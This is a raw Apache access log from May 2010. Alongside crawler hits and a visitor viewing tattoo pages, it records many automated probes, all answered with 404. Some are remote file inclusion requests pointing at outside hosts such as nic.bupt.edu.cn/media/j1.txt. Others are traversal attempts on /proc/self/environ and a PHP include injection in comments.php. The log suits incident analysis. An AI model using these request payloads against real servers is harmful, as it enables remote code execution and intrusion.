218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET /logs/access_log.1266451200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET /logs/access_log.1264204800//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET /logs/access_log.1266451200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:14:57 -0500] "GET /logs/access_log.1264204800//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.197.217.181 - - [11/May/2010:11:21:37 -0500] "GET /logs/com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.831"
66.197.217.181 - - [11/May/2010:11:21:37 -0500] "GET /logs/com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.831"
66.197.217.181 - - [11/May/2010:11:21:37 -0500] "GET /com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
66.197.217.181 - - [11/May/2010:11:21:37 -0500] "GET /com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
189.108.172.26 - - [11/May/2010:11:21:49 -0500] "GET /logs/access_log.1273190400//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
216.150.224.151 - - [11/May/2010:11:21:55 -0500] "GET /logs/com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.808"
216.150.224.151 - - [11/May/2010:11:21:55 -0500] "GET /com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
216.150.224.151 - - [11/May/2010:11:21:57 -0500] "GET /logs/com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.808"
216.150.224.151 - - [11/May/2010:11:21:57 -0500] "GET /com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
67.195.112.180 - - [11/May/2010:11:23:58 -0500] "GET /logs/access_log.1183507200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [11/May/2010:11:26:48 -0500] "GET /logs/access_log.1192147200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [11/May/2010:11:28:41 -0500] "GET /logs/access_log.1252540800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.133 - - [11/May/2010:11:32:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.149.84.14 - - [11/May/2010:11:32:40 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:32:40 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:32:40 -0500] "GET /logs/access_log.1266451200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:32:41 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:32:41 -0500] "GET /logs/access_log.1266451200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:32:41 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:28 -0500] "GET /logs/access_log.1262822400///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:28 -0500] "GET ///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:28 -0500] "GET /logs///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:29 -0500] "GET ///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:29 -0500] "GET /logs///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:29 -0500] "GET /logs/access_log.1262822400///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:43 -0500] "GET /logs/access_log.1264204800///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:34:44 -0500] "GET /logs/access_log.1264204800///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
203.115.131.17 - - [11/May/2010:11:36:19 -0500] "GET /logs///index.php?option=com_Projectfork&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
203.115.131.17 - - [11/May/2010:11:36:20 -0500] "GET ///index.php?option=com_Projectfork&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
211.239.121.204 - - [11/May/2010:11:36:50 -0500] "GET /logs/access_log.1227484800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.239.121.204 - - [11/May/2010:11:36:51 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.239.121.204 - - [11/May/2010:11:36:51 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.218.116.166 - - [11/May/2010:11:39:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.41 - - [11/May/2010:11:39:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.165 - - [11/May/2010:11:40:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.149.105.8 - - [11/May/2010:11:41:34 -0500] "GET /logs/access_log.1265241600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.218.116.162 - - [11/May/2010:11:41:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.149.105.8 - - [11/May/2010:11:41:35 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:11:41:35 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:11:43:22 -0500] "GET ///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:22 -0500] "GET /logs///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:23 -0500] "GET /logs/access_log.1262822400///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:26 -0500] "GET ///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:26 -0500] "GET /logs/access_log.1262822400///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:27 -0500] "GET /logs///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:31 -0500] "GET /logs/access_log.1264204800///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:35 -0500] "GET /logs/access_log.1264204800///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:37 -0500] "GET /logs/access_log.1262476800///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.108.151.149 - - [11/May/2010:11:43:54 -0500] "GET /logs/access_log.1262476800///modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
216.129.119.40 - - [11/May/2010:11:45:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
94.23.15.24 - - [11/May/2010:11:46:36 -0500] "GET /logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-""libwww-perl/5.803"
94.23.15.24 - - [11/May/2010:11:46:36 -0500] "GET /snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
216.129.119.43 - - [11/May/2010:11:47:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.132 - - [11/May/2010:11:47:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.10 - - [11/May/2010:11:52:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.131 - - [11/May/2010:11:54:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.42 - - [11/May/2010:11:56:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.39 - - [11/May/2010:11:56:40 -0500] "GET /logs/access_log.1179360000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.39 - - [11/May/2010:11:56:40 -0500] "GET /logs/access_log.1261008000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.59.165.18 - - [11/May/2010:11:57:22 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:22 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:22 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:26 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:26 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:26 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.204.232 - - [11/May/2010:11:57:39 -0500] "GET /logs/access_log.1245110400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.59.165.18 - - [11/May/2010:11:57:40 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:40 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:40 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:40 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:41 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:41 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:43 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:43 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:43 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:45 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:45 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:11:57:45 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
94.23.15.24 - - [11/May/2010:11:58:40 -0500] "GET /logs/access_log.1268956800/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.803"
94.23.15.24 - - [11/May/2010:11:58:40 -0500] "GET /snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
94.23.15.24 - - [11/May/2010:11:58:40 -0500] "GET /logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-""libwww-perl/5.803"
209.59.165.18 - - [11/May/2010:12:00:03 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.59.165.18 - - [11/May/2010:12:00:03 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.elhdolympus.com/toga/idxx.pdf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [11/May/2010:12:05:45 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
80.65.166.74 - - [11/May/2010:12:05:45 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.129.119.12 - - [11/May/2010:12:07:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [11/May/2010:12:08:58 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [11/May/2010:12:08:58 -0500] "GET /logs/access_log.1227398400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.163 - - [11/May/2010:12:11:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.11 - - [11/May/2010:12:12:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
93.130.236.41 - - [11/May/2010:12:18:12 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""-"
98.191.125.67 - - [11/May/2010:12:18:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:18:51 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:18:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:05 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:05 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:05 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:05 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:05 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:05 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:05 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:06 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:06 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:06 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:06 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:19:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.129.119.13 - - [11/May/2010:12:19:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.191.125.67 - - [11/May/2010:12:19:12 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.191.125.67 - - [11/May/2010:12:20:00 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
